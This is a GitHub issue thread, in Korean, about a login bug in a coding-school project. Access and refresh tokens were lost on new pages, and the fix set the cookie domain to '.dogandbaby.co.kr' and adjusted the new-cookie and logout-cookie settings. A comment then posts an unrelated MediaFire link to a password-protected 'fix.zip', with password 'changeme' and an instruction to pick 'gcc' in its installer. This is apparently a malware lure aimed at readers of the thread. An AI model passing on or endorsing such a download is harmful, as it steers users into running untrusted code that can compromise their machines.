### ISSUE TITLE
로그인 도메인 주소 변경

### ISSUE THREAD

**Issue by youngkwangjoo** [OZ-Coding-School/oz_03_collabo-001-BE#140]
**버그 설명**
로그인 refresh, access token domain 주소를 변경함

기본 api.dogandbaby.co.kr 로 되있을 경우 새 페이지로 들어가면 토큰이 사라지는 문제가 발생함

쿠키 설정에 직접
.dogandbaby.co.kr 로 명시해줌

추가로 새 쿠키랑, 로그아웃 쿠키 설정도 변경해줘서 해결함

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
